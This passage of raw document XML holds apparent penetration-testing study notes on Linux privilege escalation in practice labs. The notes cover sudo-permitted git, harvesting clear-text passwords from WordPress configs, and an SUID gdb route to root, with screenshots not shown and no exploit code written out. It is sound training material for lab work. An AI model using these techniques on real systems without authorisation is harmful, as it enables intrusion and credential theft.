        <w:t xml:space="preserve">(buildd@lgw01-06) → Name of the build machine (build daemon that compiled the kernel).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001526">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1394"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2)) → GCC compiler version used, with build date.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001527">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1394"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">16.04 is the Ubuntu Version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001528">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1394"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Xenial is the code name for 16.04</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001529">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000152A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interfaces (Network interfaces):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000152B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4129088" cy="2308186"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="273" name="image263.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image263.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId404"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4129088" cy="2308186"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000152C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="831"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 20 shows only one network interface apart from the loopback interface. This means that the target machine is not connected to the internal network, and we cannot use it as a pivot point.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000152D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000152E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000152F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4862513" cy="1348100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="539" name="image523.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image523.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId405"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4862513" cy="1348100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001530">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="755"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 21 shows that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">daniela</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with sudo privileges without entering a password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001531">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="755"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from XXXXXXXXX 27.2.2. A Link to the Past</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001532">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001533">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyzing Wordpress Files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001534">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1562100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="543" name="image525.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image525.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId406"/>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1535">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="731"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Discovering a clear-text password is always a potential high value finding. Let's save the password in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">creds.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file on our Kali machine for future use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001536">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="731"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another interesting aspect of this finding is the path displayed starts with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/www/wordpress/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The WordPress instance is not installed in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where web applications are commonly found on Debian-based Linux systems. While this is not an actionable result, we should keep it in mind for future steps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001537">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="731"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from XXXXXXXXX 27.2.2. A Link to the Past</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001538">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001539">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searching Wordpress wp-config.php files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000153A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="952500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="413" name="image392.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image392.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId407"/>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153B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId408">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BTRSys2.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, and it revealed credentials for root user for MySQL </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000153C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000153D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyzing Github Files section:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000153E">
      <w:pPr>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="421" name="image419.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image419.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId409"/>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153F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="739"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on the output in listing 23, we can assume that Git is used as the version control system for the WordPress instance. Reviewing the commits of the Git repository may allow us to identify changes in configuration data and sensitive information such as passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001540">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="739"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The directory is owned by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is not readable by other users as shown in Listing 23. However, we can leverage sudo to use Git commands in a privileged context and therefore search the repository for sensitive information.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001541">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001542">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Files with Interesting Permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001543">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4090988" cy="2432302"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="274" name="image275.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image275.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId410"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4090988" cy="2432302"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001544">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId411">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Gaara</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play box, and /usr/bin/gdb was actually vulnerable since if you looked at GTFOBins, there was an SUID section (if you look at the second line in the screenshot, you can tell that this was an SUID attack vector) with a command that allowed for instant root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001545">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001546">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001547">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cleaned Processes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001548">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2743200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79" name="image90.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image90.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId412"/>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1549">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files, since those are 3rd party softwares, and not standard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000154A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId413">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PC</w:t>
        </w:r>
      </w:hyperlink>
